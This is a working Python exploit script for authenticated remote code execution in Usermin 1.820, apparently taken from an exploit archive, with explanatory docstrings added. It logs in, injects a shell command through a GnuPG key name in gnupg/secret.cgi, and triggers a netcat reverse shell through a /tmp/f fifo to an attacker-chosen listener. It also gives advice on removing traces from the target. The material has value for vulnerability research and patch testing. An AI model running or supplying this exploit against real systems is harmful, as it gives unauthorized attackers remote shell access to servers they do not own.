Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )
#!/usr/bin/python3 | |
# -*- coding: utf-8 -*- | |
# Usermin - Remote Code Execution (Authenticated) ( Version 1.820 ) | |
# author: twitter.com/numanturle | |
# usage: usermin.py [-h] -u HOST -l LOGIN -p PASSWORD | |
# https://youtu.be/wiRIWFAhz24 | |
import argparse,requests,warnings,json,re | |
from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
from cmd import Cmd | |
# Every request below is sent with verify=False, so urllib3 would emit an
# InsecureRequestWarning per call; drop those warnings process-wide.
warnings.filterwarnings('ignore', category=InsecureRequestWarning)
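def init():
    """Parse the command line and run the exploit chain.

    Required flags are -u/--host, -l/--login and -p/--password. The optional
    --lhost/--lport name the listener the reverse shell should call back to;
    they default to the values the script previously hard-coded (0.0.0.0:1337),
    and 0.0.0.0 is a bind address, not something a remote host can connect to,
    so set --lhost to your own IP for a working callback.

    Note: a password passed on the command line is visible in the process
    list and shell history of the attacking machine.
    """
    parser = argparse.ArgumentParser(
        description='Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )')
    parser.add_argument('-u', '--host', help='Host', type=str, required=True)
    parser.add_argument('-l', '--login', help='Username', type=str, required=True)
    parser.add_argument('-p', '--password', help='Password', type=str, required=True)
    parser.add_argument('--lhost', help='Reverse-shell listener address (default: 0.0.0.0)',
                        type=str, default="0.0.0.0")
    parser.add_argument('--lport', help='Reverse-shell listener port (default: 1337)',
                        type=int, default=1337)
    args = parser.parse_args()
    exploit(args)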
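def _login(session, target, username, password):
    """POST the credentials to session_login.cgi and report whether login succeeded.

    The `redirect`/`testing` cookies are sent because the login CGI expects them
    (presumably its cookie-support check); the Referer is required by Webmin's
    referer check. Success is detected by the presence of "webmin_search.cgi"
    in the response, which is the marker the original script used.
    """
    headers = {
        'Cookie': 'redirect=1; testing=1;',
        'Referer': target,
    }
    resp = session.post(target + "/session_login.cgi", headers=headers, verify=False,
                        data={"user": username, "pass": password})
    return "webmin_search.cgi" in resp.text


def _plant_payload(session, target, payload):
    """Create a GnuPG secret key whose name carries the shell injection.

    gnupg/secret.cgi passes the key name into a shell command line without
    escaping (the vulnerability this script exploits). The leading `";` closes
    the quoted name argument, and the trailing `echo "` presumably re-balances
    the quotes so the rest of the command line still parses. Returns True when
    the CGI reports the key was created ("successfully" in the response).
    """
    post_data = {
        "name": '";{}echo "'.format(payload),
        "email": "1337@webmin.com",
    }
    print("[+] Payload {}".format(post_data))
    session.headers.update({'referer': target})
    resp = session.post(target + "/gnupg/secret.cgi", verify=False, data=post_data)
    return "successfully" in resp.text


def _find_key(session, target):
    """Return the edit_key.cgi query string for the planted key, or None.

    The original picked the second-to-last edit_key.cgi link on list_keys.cgi
    (presumably the newest secret key ahead of a trailing entry); that choice is
    kept, but a page with fewer than two links now yields None instead of an
    IndexError. resp.text is matched rather than str(resp.content): the latter
    is a bytes repr, in which a page containing both quote characters has every
    `'` escaped as `\\'`, so the captured query string would end in a backslash.
    """
    session.headers.update({'referer': target})
    resp = session.post(target + "/gnupg/list_keys.cgi", verify=False)
    links = re.findall(r"edit_key.cgi\?(.*?)'", resp.text)
    if len(links) < 2:
        return None
    return links[-2]


def _trigger(session, target, key):
    """Open edit_key.cgi for the planted key, which runs the injected command.

    Once the reverse shell is running the CGI never returns, so a short read
    timeout is the expected outcome and is treated as success. Any other
    transport error (connection refused, TLS failure) still propagates.
    """
    session.headers.update({'referer': target})
    try:
        session.post(target + "/gnupg/edit_key.cgi?{}".format(key), verify=False, timeout=3)
    except requests.exceptions.ReadTimeout:
        pass


def exploit(args):
    """Run the authenticated Usermin 1.820 RCE chain against a single host.

    Args:
        args: argparse namespace with `host`, `login`, `password`. Optional
            `lhost`/`lport` select the listener the reverse shell calls back
            to; when absent they fall back to the original hard-coded
            "0.0.0.0" / 1337, and 0.0.0.0 is a bind address, not a callback
            address, so the shell will not reach you unless lhost is set.

    Returns None; progress is printed to stdout. Network only — nothing is
    computed locally.

    Operational notes:
      - Usermin's port (20000) is hard-coded and every request is sent with
        verify=False, so the target's TLS certificate is never validated and
        the credentials go to whoever answers on that port. Do not run this
        across a network you do not trust.
      - The reverse shell is a plaintext nc pipe through /tmp/f.
      - Artifacts left on the target: the fifo /tmp/f and a GnuPG secret key
        whose name contains the full command line. Clean both up afterwards.
    """
    listen_ip = getattr(args, "lhost", None) or "0.0.0.0"
    listen_port = getattr(args, "lport", None) or 1337
    target = "https://{}:20000".format(args.host)
    print("[+] Target {}".format(target))
    if listen_ip == "0.0.0.0":
        print("[!] lhost is 0.0.0.0, which is not a routable callback address; "
              "the reverse shell will not connect back to you")

    session = requests.Session()
    if not _login(session, target, args.login, args.password):
        print("[-] AUTH : Login failed.")
        return
    print("[+] Login successfully")

    print("[+] Setup GnuPG")
    payload = ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f;"
               .format(listen_ip, listen_port))
    if not _plant_payload(session, target, payload):
        print("[-] an unexpected error occurred")
        return
    print("[+] Setup successful")

    print("[+] Fetching key list")
    key = _find_key(session, target)
    if key is None:
        print("[-] could not locate the planted key in list_keys.cgi")
        return
    print("[+] Key : {}".format(key))

    _trigger(session, target, key)
    print("[+] 5ucc355fully_3xpl017")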
if __name__ == "__main__": | |
init() |